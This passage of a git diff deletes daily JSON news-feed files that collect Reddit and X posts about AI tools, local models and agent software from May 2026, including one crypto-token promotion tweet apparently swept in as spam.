on official status page! How do you know if an LLM API is actually down vs just you?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t4kbpa/gemini_has_a_big_outage_going_on_but_refuses_to/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-05T16:22:20.000Z", - "summary": "Genuine question. Gemini had a 5+ hour outage this morning. I found out because a user reported it on Tickerr, not because Google said anything. Status page was green the whole time. I built Tickerr using Claude Code for this only. It runs independent streaming API calls to LLM providers every 5 minutes and tracks real inference performance - not just HTTP pings. https://preview.redd.it/r6ugn0e57bzg1.png?width=1080&format=png&auto=webp&s=779961c2ee83245f9a46c10ced99f0ddc854494b The other way to know it's not just you is if other people are hitting the same thing at the same time. Which is why I also built a crowdsourced failure signal into [Tickerr.ai](https://tickerr.ai/mcp-server) \\- agents report 5xx errors anonymously and get back whether others are seeing the same thing. It's free to try, if you want to add reporting to your agent, three ways depending on your setup: **MCP (Claude Code, Cursor, Windsurf):** report_incident(provider=\"google\", model=\"gemini-2.5-flash\", error_code=503, error_type=\"overloaded\") **REST (any language):** curl -X POST https://tickerr.ai/api/v1/report \\ -H \"Content-Type: application/json\" \\ -d '{\"provider\":\"google\",\"model\":\"gemini-2.5-fla…", - "category": "ai_tools" - }, - { - "title": "SenseNova-U1-8B-MoT (novel open source multimodal understanding + image generation model) seems like a bigger deal architecturally then it’s getting credit for", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t4i1yx/sensenovau18bmot_novel_open_source_multimodal/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T15:02:15.000Z", - "summary": "SenseNova dropped SenseNova-U1 on the last day of April and I’ve only found like one other mostly ignored post on this sub talking about it. It seems like a really exciting novel architecture to me. It appears to be exceptional at text-to-infographics as one of its major high points, as well as being good at image editing, generation, and visual understanding. Supposedly it’s not the traditional mash-up (no VAE) types of multimodal models that we’ve seen before. The following is from their Hugging Face: https://huggingface.co/sensenova/SenseNova-U1-8B-MoT ——— Overview SenseNova U1 is a new series of native multimodal models that unifies multimodal understanding, reasoning, and generation within a monolithic architecture. It marks a fundamental paradigm shift in multimodal AI: from modality integration to true unification. Rather than relying on adapters to translate between modalities, SenseNova U1 models think-and-act across language and vision natively. The unification of visual understanding and generation opens tremendous possibilities. SenseNova U1 sits in the stage of Data-driven Learning (like ChatGPT), yet gestures toward the next stage, that is, Agentic Learning (like Ope…", - "category": "ai_models" - }, - { - "title": "Local Dream 2.4.3 - SDXL support, tag autocomplete and more", - "url": "https://reddit.com/r/StableDiffusion/comments/1t4d7ix/local_dream_243_sdxl_support_tag_autocomplete_and/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T11:53:55.000Z", - "summary": "Local Dream 2.4 was released two weeks ago and has since received three more updates. The main new features: \\- SDXL/Illustrious/PonyXL support for Snapdragon 8 Gen 3 and newer (Elite) chips, based on NPU \\- Tag autocomplete from CSV import \\- Token counter for prompts \\- LCM scheduler and many more fixes have been added. It’s worth checking out the release notes for version 2.4! [https://github.com/xororz/local-dream/releases](https://github.com/xororz/local-dream/releases)", - "category": "creative_tools" - }, - { - "title": "Building a 9-ball AI player: Candidate generation for direct cut shots [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t3xplr/building_a_9ball_ai_player_candidate_generation/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-04T23:00:30.000Z", - "summary": "I'm building a 9-ball-player to help with pattern play. There are many ways to make the next ball, and sometimes in more than one obvious pocket. Which should should you choose depends on probability of making that shot AND ending up in a favorable spot for the next shot, that is also amenable to getting good position for the shot after. To that end, I have built the following components: * A transformer based model that learns p(win) given a table layout. * Candidate shot generator that includes cut shots, bank shots, kick shots, caroms and combination shots as well as safeties. * An evaluator that will pick the best shots based on the p(win) model on the resulting state of each candidate shot. The ground truth: **pooltool** Pool physics is well-modeled but expensive. I use pooltool python library, a solid open-source billiards simulator with accurate ball-cushion-pocket-felt interactions. A single shot takes \\~5–15 ms to simulate end-to-end on one CPU thread for the typical 1–3 object-ball layouts that come up in shot evaluation; full racks (9 object balls) push that to \\~20–50 ms because there are more pairwise collisions to track. Sounds fast until you do the math. For each la…", - "category": "ai_research" - }, - { - "title": "Parax v0.5: Parametric Modeling in JAX [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t3jmdc/parax_v05_parametric_modeling_in_jax_p/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-04T14:38:31.000Z", - "summary": "Hi everyone! Just sharing an update on my project [Parax](https://github.com/gvcallen/parax), which caters for \"parametric modeling\" in JAX. Previously, Parax was more focused on scientific applications, however I've since generalized it to be a tool useful for any type of JAX work. It now has a strong focus on a clean, extandable API, as well as ensuring the library is entirely **opt-in,** as opposed to its previous versions which took a more framework-like approach. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters * Filtering and manipulation tools The documentation is available [here](https://gvcallen.github.io/parax/) along with some basic examples. Perhaps the package is of use to someone out there! Cheers, Gary", - "category": "ai_research" - }, - { - "title": "AutoBe benchmark: structured harness narrows frontier-vs-local gap in backend generation [D]", - "url": "https://reddit.com/r/MachineLearning/comments/1t3hks9/autobe_benchmark_structured_harness_narrows/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-04T13:21:59.000Z", - "summary": "AutoBe is a benchmark for end-to-end backend generation. One natural language request produces six outputs: requirements analysis, ERD, OpenAPI spec, E2E tests, NestJS implementation, and a type-safe SDK. Each phase fills a predefined AST via structured function calling rather than generating unstructured code. The scoring rubric is 100 points driven entirely by static analysis - the same artifact scores the same regardless of who reruns it. The headline finding is that scores cluster tightly. GLM 5 tops the benchmark run. qwen3.5-27b sits directly behind frontier models. Several local models produced enterprise-scale backends with 100% compile success. The author's interpretation: once the harness is structured, backend-generation quality is constrained more by harness design than by model prestige. The cost contrast is significant. A full benchmark run at frontier pricing ($5/M input tokens) runs $1,000-$1,500 per model. The next benchmark round plans to filter to models at $0.25/M input or runnable on a 64GB unified-memory laptop - which would include most of the models that clustered near the top anyway. The honest caveat from the author: this uses four reference projects and…", - "category": "ai_research" - }, - { - "title": "\"FLUX Creator Program\" - New Flux models sooner than expected?", - "url": "https://reddit.com/r/StableDiffusion/comments/1t4vlo7/flux_creator_program_new_flux_models_sooner_than/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-05T23:10:28.000Z", - "summary": "are we getting new Flux models soon? hopefully open source. Would love a new klein model [link](https://x.com/bfl_ml/status/2051723708046233688) to post", - "category": "creative_tools" - }, - { - "title": "Best Open Source models for running on Gaming PC or Mac mini M4", - "url": "https://reddit.com/r/StableDiffusion/comments/1t4p2mn/best_open_source_models_for_running_on_gaming_pc/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-05T19:04:40.000Z", - "summary": "I have a gaming PC with a Nvidia 5070 12gb VRAM 32gb RAM and a ryzen 9 7800x 12 core I also have a Mac mini m4 * Chip (Processor): Apple M4 chip with 10-core CPU, 10-core GPU, 16-core Neural Engine * Memory: 32GB unified memory * Storage: 512GB SSD storage Wanted to get opinions on best open source models for agentic and generative purposes on these machines Thank you!", - "category": "creative_tools" - }, - { - "title": "OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integrati…", - "url": "https://x.com/H_Mhatre_/status/2051715305890521578", - "source": "X / @h_mhatre_", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T17:27:02.000Z", - "summary": "OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integration. $MSFT", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-06.json b/data/news-feed-2026-05-06.json deleted file mode 100644 index d8493de..0000000 --- a/data/news-feed-2026-05-06.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:38.082Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-06", - "article_count": 15, - "archived_story_count": 542, - "articles": [ - { - "title": "[WIP] ComfyUI Powered Klein 2 KV Edit i2i plugin (Chromium)", - "url": "https://reddit.com/r/StableDiffusion/comments/1t5rofv/wip_comfyui_powered_klein_2_kv_edit_i2i_plugin/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-06T22:12:19.000Z", - "summary": "This is something I am working on based upon an earlier WIP item that was using ZiT for something similar. However with Klein KV a lot of power to manipulate is in the prompts. So I am currently testing/building an i2i web browser plugin that allows custom prompt creating and saving and can be expanded and sorted by tabs. I'm going to post this link as a demo and/or bones for other to also take and run with as well. I do plan on updating some things here myself in my upcoming free time, but for some people this might be just what may work for them. At the end of the day it's all just html/js/css and we all have LLM's and enjoy open source. This can also be converted to a firefox plugin if you wish as well. Feel free to take it and do whatever else you may want to and consider this the starter template for it. [https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2\\_KVEdit\\_i2i%20-%20Chromium%20Sidebar-Demo.zip](https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2_KVEdit_i2i%20-%20Chromium%20Sidebar-Demo.zip) If you never interacted with ComfyUI outside of it, you will need to enable API mode in the settings. You will al…", - "category": "creative_tools" - }, - { - "title": "OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI", - "url": "https://x.com/Reeperr131/status/2052074977973694608", - "source": "X search / Agent workflows", - "tags": [ - "api_update", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-06T17:16:15.000Z", - "summary": "OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI", - "category": "ai_agents" - }, - { - "title": "CopilotKit (MIT) - Open-Source Building Blocks for Agent Apps and Generative UI", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t5gus6/copilotkit_mit_opensource_building_blocks_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-06T15:50:28.000Z", - "summary": "Even with agent framework DX getting somewhat better - it's still really annoying to build real apps with them. Even a basic in-app agent chatbot already drags in streaming, tool call rendering, and state sync. Vercel's AI SDK makes it much easier to start, but it pulls you right into Vercel's whole stack and is too opinionated on the agent framework side. This is what is great about CopilotKit (30k stars, MIT). They provide React building blocks for the agent UI layer: chat, streaming, tool calls, HITL, generative UI. The piece that makes it horizontal is AG-UI, an open protocol it speaks on the backend, with shipped support in LangGraph, ADK, Strands, CrewAI, Mastra, Pydantic AI, LlamaIndex, Agno, and others. Same UI, any agent framework, no per-framework adapter. Bring your own everything: agent, model, backend, hosting. It's really powerful. I discovered CopilotKit after being involved with the community on open source AG-UI which they're very involved with. Have had a great experience building with it! Not sure why people aren't talking about it more. Repo: [https://github.com/CopilotKit/CopilotKit](https://github.com/CopilotKit/CopilotKit)", - "category": "ai_models" - }, - { - "title": "2.5x faster inference with Qwen 3.6 27B using MTP - Finally a viable option for local agentic coding - 262k context on 48GB - Fixed chat template - Drop-in OpenAI and Anthropic API endpoints", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t57xuu/25x_faster_inference_with_qwen_36_27b_using_mtp/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-06T09:35:42.000Z", - "summary": "> **WARNING: wait before download from HF: I just realised my upload of the new versions with the additional fix in the chat template has not completed yet. I will remove this warning once done** The recent PR to llama.cpp bring MTP support to Qwen 3.6 27B. This uses the built-in tensor layers for speculative decoding. None of the existing GGUF have it, as they need to be converted with this PR. I have tested it locally on my mac M2 Max 96GB, and the results are amazing: 2.5x speed increase, bringing it to 28 tok/s! In addition the recent releases of llama.cpp also support turboquants, which helps a lot with memory usage in more constrained environment (including an additional speed boost). I have converted the most useful quants and uploaded them to HF. Even if you are using apple silicon, you should use those instead of MLX. You can download them here: [https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF](https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF) This also includes 7 fixes I made to the original jinja chat template, due to vLLM specificity which broke in other tools: https://huggingface.co/froggeric/Qwen-Fixed-Chat-Templates For now, you will need to compile yo…", - "category": "ai_models" - }, - { - "title": "Getting error \"command 'claude-vscode.editor.openLast' not found\", but not like anyone has talked about.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t51ayl/getting_error_command_claudevscodeeditoropenlast/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-06T03:26:08.000Z", - "summary": "I've read many posts and github pages about this exact issue, but mine is different. Its not jsut that error. Any anthropic claude code command from logout to open in sidebar resutls in the error \"Command 'Claude Code: <command>' resulted in an error. command 'claude-vscode.sidebar.<command>' not found\". I have tried to diagnose and fix the issue and its not working. Here is what is not working: 1. Claude sidebar not working 2. No claude commands from command pallete working 3. Claude extension icon not showing up on far left side and not in the dropdown for extensions to show Here is the error from Developer: Show Logs.. with choosing Extension Host: `2026-05-05 21:57:07.411 [error] Activating extension Anthropic.claude-code failed due to an error:` `2026-05-05 21:57:07.412 [error] TypeError: The argument 'filename' must be a file URL object, file URL string, or absolute path string. Received 'file:///home/runner/work/claude-cli-internal/claude-cli-internal/build-agent-sdk/sdk.mjs'` `at Module.createRequire (node:internal/modules/cjs/loader:1922:13)` `at Object.<anonymous> (c:\\Users\\___\\.vscode\\extensions\\anthropic.claude-code-2.1.129-win32-x64\\extension.js:102:…", - "category": "ai_tools" - }, - { - "title": "UniReasoner: Using LLMs as \"Universal Reasoners\" to Fix Prompt Alignment", - "url": "https://reddit.com/r/StableDiffusion/comments/1t5p67x/unireasoner_using_llms_as_universal_reasoners_to/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-06T20:39:46.000Z", - "summary": "A new paper titled Large Language Models are Universal Reasoners for Visual Generation introduces UniReasoner, a framework designed to close the \"understanding-generation gap\" in text-to-image models. The core observation is that while unified multimodal models often fail to follow complex prompts during generation (e.g., getting counts or spatial relations wrong), the exact same model is usually excellent at verifying those mistakes when looking at the resulting image. Current models like BAGEL might generate five apples when asked for four. However, if you ask that same model to count the apples in its own generated image, it correctly identifies there are five. This suggests that the model's \"understanding\" capacity is much stronger than its \"generative\" capacity. UniReasoner converts this verification strength into direct guidance for the diffusion process using a three-stage pipeline: 1. The LLM generates a coarse visual draft using discrete vision tokens. This acts as a spatial and semantic plan for the scene. 2. The same LLM evaluates its draft against the original prompt. It produces a \"grounded evaluation\" in text, pinpointing exactly what is wrong (e.g., \"Missing a bicyc…", - "category": "creative_tools" - }, - { - "title": "Followup to the kanban for Claude Code - now vibeyard's home screen is a yard I build myself", - "url": "https://reddit.com/r/ClaudeAI/comments/1t5og8l/followup_to_the_kanban_for_claude_code_now/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-06T20:13:39.000Z", - "summary": "Even with the kanban, I still opened 3 tabs every morning - PRs in GitHub, tasks on the board, half-finished sessions in the terminal - just to figure out what to work on. So I made the home screen of **Vibeyard** (open-source, MIT) a yard you build yourself. Drop in widgets - open PRs, issues, AI readiness, active sessions, kanban, team - arrange them however you want. **Click any card → it spawns a Claude session scoped to it. A PR opens a review session. An issue opens a plan-the-fix session. A stale session resumes where you left off.** (Followup to my last post: https://www.reddit.com/r/ClaudeAI/comments/1sye8bs/) GitHub: [https://github.com/elirantutia/vibeyard](https://github.com/elirantutia/vibeyard) **Contributions and feedbacks are welcome!**", - "category": "ai_tools" - }, - { - "title": "Internal tools wIth no MCP", - "url": "https://reddit.com/r/ClaudeAI/comments/1t5ah5r/internal_tools_with_no_mcp/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-06T11:46:48.000Z", - "summary": "We have several internal systems that all have robust APIs. Some are internet facing and some are not. None of them have MCP servers available for them. Im trying to figure out what and how the best way is to connect Claude Enterprise to these systems via API to pull the data we need from them with MCP.", - "category": "ai_tools" - }, - { - "title": "Show HN: Adam – An embeddable cross-platform AI agent library", - "url": "https://github.com/sqliteai/adam", - "source": "Hacker News", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 0.96, - "date": "2026-05-06T12:56:29.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "The GB10 Solution Atlas is now open source, the inference engine made for the community with breakneck inference speeds (Qwen3.6-35B-FP8 100+ tok/s)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t5p2yv/the_gb10_solution_atlas_is_now_open_source_the/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-06T20:36:19.000Z", - "summary": "Some of you saw our post a couple weeks back about hitting 102 tok/s stable on Qwen3.5-35B on a DGX Spark. A lot of you asked \"cool, where's the code?\" Today's the day: [Github](https://github.com/Avarok-Cybersecurity/atlas) **Atlas is open source.** Pure Rust + CUDA, no PyTorch, no Python runtime, \\~2.5 GB image, <2 minute cold start. We rewrote the whole stack from HTTP handler to kernel dispatch because the bottleneck on Spark wasn't the silicon, it was 20+ GB of generic Python machinery sitting between your prompt and the GPU. We need community support to keep elevating Atlas **for developers**. **Numbers on a single DGX Spark (GB10):** Qwen3.5-35B (NVFP4, MTP K=2): 130 tok/s peak, \\~111 tok/s sustained → 3.0–3.3x vLLM at testing time Qwen3.5-122B (NVFP4, EP=2): \\~50 tok/s decode Qwen3-Next-80B-A3B (NVFP4, MTP): \\~87 tok/s Nemotron-3 Nano 30B (FP8): \\~88 tok/s Full model matrix on the site (Minimax2.7, Qwen3.6, Gemma too!) **What's actually different:** Hand-tuned CUDA kernels for Blackwell SM120/121 meaning attention, MoE, GDN, Mamba-2. No generic fallbacks. Native NVFP4 + FP8 on tensor cores MTP (Multi-Token Prediction) speculative decoding for up to 3x throughput on deco…", - "category": "ai_models" - }, - { - "title": "Anyone else tried this RefineAnything LoRA? Pretty impressed so far", - "url": "https://reddit.com/r/StableDiffusion/comments/1t5n9nz/anyone_else_tried_this_refineanything_lora_pretty/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-06T19:32:13.000Z", - "summary": "Been messing around with the RefineAnything project for the past few days and honestly the results are kinda wild for local detail fixes. Figured I'd share in case anyone else is into this stuff. Quick rundown of what it does: you give it an image + a region (scribble mask or bounding box), and it cleans up just that area — text, logos, product labels, thin lines, that kind of thing. The rest of the image stays untouched. Works with or without a reference image too. Original project: [https://github.com/limuloo/RefineAnything](https://github.com/limuloo/RefineAnything) While I was testing it I got tired of doing the mask prep, reference alignment, and paste-back manually every time, so I built a little ComfyUI plugin to handle all that. Just wanted to be clear though — **the plugin isn't tied to this specific LoRA at all**. It's totally model-agnostic, so it should work fine for pretty much any local detail repair workflow you're already running. RefineAnything just happens to be what I tested it with, and my test workflow is included in the plugin repo if you want to try it. Plugin: [https://github.com/1Kynx/ComfyUI-RefineNode](https://github.com/1Kynx/ComfyUI-RefineNode) Where I…", - "category": "creative_tools" - }, - { - "title": "I analyzed 922 agentic task trace and found the secret weapon of DeepSeek v4", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t5lywi/i_analyzed_922_agentic_task_trace_and_found_the/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-06T18:46:20.000Z", - "summary": "I recently did a benchmark of deepseek v4 in agentic tasks. Performance-wise, it's one of the best open source models, as expected. What really surprised me is the cost. I mean I know it's cheap, but it's cheap in a way that doesn't really make sense. # Cost Estimation Let's take v4 flash as example since it's not on sale (so it can better reflect the actual provider cost). [deepseek v4 flash price on openrouter](https://preview.redd.it/vh4qfgn6zjzg1.png?width=562&format=png&auto=webp&s=8df0fae84b5b5840efdc87e50ef2db6a5fc23134) [opus 4.7 price on openrouter](https://preview.redd.it/c7qumr2u0kzg1.png?width=533&format=png&auto=webp&s=31101fb42a75d2ba33169c570c61e4297c28901b) Looking at OpenRouter price, deepseek v4 flash price is about 0.03x opus 4.7 price. (We only look at input token price because in long agentic task, input token is the dominant cost.) So if v4 flash uses similar amount of token in a task as opus 4.7, the actual cost should be somewhere around 0.03x compared to using opus. # Actual Data Then I ran the benchmark, long agentic tasks running in openclaw (which uses PI for agent loop), openrouter as model provider. The actual cost data blew my…", - "category": "ai_models" - }, - { - "title": "the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not \"ai productivity copilot for everyone.\" one pai…", - "url": "https://x.com/NovaByArun/status/2052077319960047791", - "source": "X search / AI vibes", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-06T17:25:33.000Z", - "summary": "the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not \"ai productivity copilot for everyone.\" one painful workflow. one credible audience.", - "category": "ai_tools" - }, - { - "title": "Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha", - "url": "https://x.com/AzaleasWatkin/status/2052075760354238868", - "source": "X search / Agent workflows", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-05-06T17:19:21.000Z", - "summary": "Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha", - "category": "ai_agents" - }, - { - "title": "I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic?", - "url": "https://x.com/MichaelAzmy/status/2052075579424334002", - "source": "X search / AI model updates", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-06T17:18:38.000Z", - "summary": "I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic?", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-07.json b/data/news-feed-2026-05-07.json deleted file mode 100644 index 1af29d9..0000000 --- a/data/news-feed-2026-05-07.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:38.227Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-07", - "article_count": 15, - "archived_story_count": 548, - "articles": [ - { - "title": "I embedded an AI agent in my shell. It can now run interactive programs.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t6nuhz/i_embedded_an_ai_agent_in_my_shell_it_can_now_run/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source", - "developer_tool", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "open_source", - "developer_tool", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-07T21:18:26.000Z", - "summary": "I want to share a fun side project of mine over the past month or so where I tried to build a shell with an AI agent embedded. The embedded agent knows everything happening in the shell so I don't have to keep copy-and-pasting error messages to another coding agent while working in a terminal. Now it has grown into a useful tool in my daily workflow and a fun playground for agent experiments. Here I'm showing a new extension I'm building that launches an agent on a floating overlay that can read my terminal and type out commands for me, which I thought was really cool. I can already see lots of application of this idea such as helping me with interactive installation or helping me over an ssh session without remote installation. The project is fully [open source](https://github.com/guanyilun/agent-sh) with mit license, feel free to try it out and build on it. It should support local models as well as cloud models. This overlay feature is an experimental extension that only exists in the example folder. You can point your coding agent to the docs to help you set it up should you want to try it out (be sure to grab both the overlay-agent extension for the floating display and the te…", - "category": "ai_models" - }, - { - "title": "I just tried Reactor's open source world model demo, here are my thoughts", - "url": "https://reddit.com/r/StableDiffusion/comments/1t6qfff/i_just_tried_reactors_open_source_world_model/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-07T23:02:18.000Z", - "summary": "So I recently stumbled upon Reactor's new demo of an open source world model. AFAIK they are not training the models themselves, but they are the infra that powers them and will be offering them via SDK, which will be super interesting to see once this is available via API since so far they've been just text-to-video demos. Having tried it extensively, some of my thoughts: * The models are getting very good very fast * This can massively impact industries such as robotics * I am impressed at the visual fidelity of the model * We are still a few years away from anything gaming-related Would love to hear what you all think!", - "category": "creative_tools" - }, - { - "title": "My Claude dreams at night and remembers everything. Better than mempalace.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t5yhio/my_claude_dreams_at_night_and_remembers/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "tool_update" - ], - "matching_tags": [ - "mcp", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-07T03:08:34.000Z", - "summary": "Back in January I got tired of the same thing everyone complains about now you start a new session with Claude and it has no idea who you are. Every time. From scratch. So I built iai-mcp. A local daemon that captures every conversation, organizes it into three memory tiers, and feeds the right context back when you start a new session. No \"remember this.\" No copy-pasting from old chats. It just knows. I've been using it daily with Claude Code since January. Five months. At this point it knows my coding style, my project structures, my preferences things I never explicitly told it to save. It picked them up from conversation and held onto them. It stores everything verbatim, runs neural embeddings locally, encrypts at rest with AES-256, consolidates memory in the background while your machine is idle, and ships every benchmark harness so you can verify the numbers yourself. Verbatim recall above 99%. Retrieval under 100ms. Session-start cost under 3,000 tokens. I didn't release it because I was building it for myself. It worked, so I kept using it. But watching the space blow up made me realize maybe other people want this too. So here it is. Open source. MIT licensed. Five months…", - "category": "ai_tools" - }, - { - "title": "Claude Code: the only CLI where scrolling up is a premium feature", - "url": "https://reddit.com/r/ClaudeAI/comments/1t6fwhx/claude_code_the_only_cli_where_scrolling_up_is_a/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-07T16:38:48.000Z", - "summary": "Love Claude Code. Genuinely. It's changed how I work. But can we talk about how in 2026, a $200/month AI coding tool can't do what echo \"hello world\" has done since 1971? If Claude writes more than one screenful of text — which it does approximately always — you scroll up and get... nothing. A beautiful void. Your conversation is gone. It existed briefly, like a Snapchat from your AI pair programmer. This has been reported across at least half a dozen GitHub issues going back months. The \"workarounds\": \\- Ctrl+O transcript mode — congrats, you can now read your conversation history, but Claude is frozen while you do. It's like being told \"you can look at your notes, but only if you stop the meeting.\" \\- iTerm2's \"Save lines to scrollback\" setting — tried it. Same blank screen. Maybe my iTerm is also frustrated. \\- Open in editor with v — so the workflow is: ask Claude a question, read the first half on screen, press Ctrl+O, press v, open vim, scroll to where you were, read the rest, quit vim, go back to Claude. Productivity! The root cause is apparently the alternate screen buffer from the Ink framework. I get it, architectural decisions are hard. But this is the equivalent of shi…", - "category": "ai_tools" - }, - { - "title": "why llama.cpp can’t combine speculative decode methods?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t63snn/why_llamacpp_cant_combine_speculative_decode/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-07T07:53:13.000Z", - "summary": "dicking around with the new mtp speculative decode with qwen3.6 27b, and it’s great. but for agentic coding i’ve seen significant improvements from ngram, because a decent fraction of the time (e.g. calling edit tool) the model is just repeating verbatim a section of code that it has already seen before. ngram can speculate on a lot of tokens reeaallly fast in comparison. it’d be great if we could combine them by using them both at the same time, but it looks like if i add them both to the command line arguments, only ngram is active. is there any reason both can’t be used 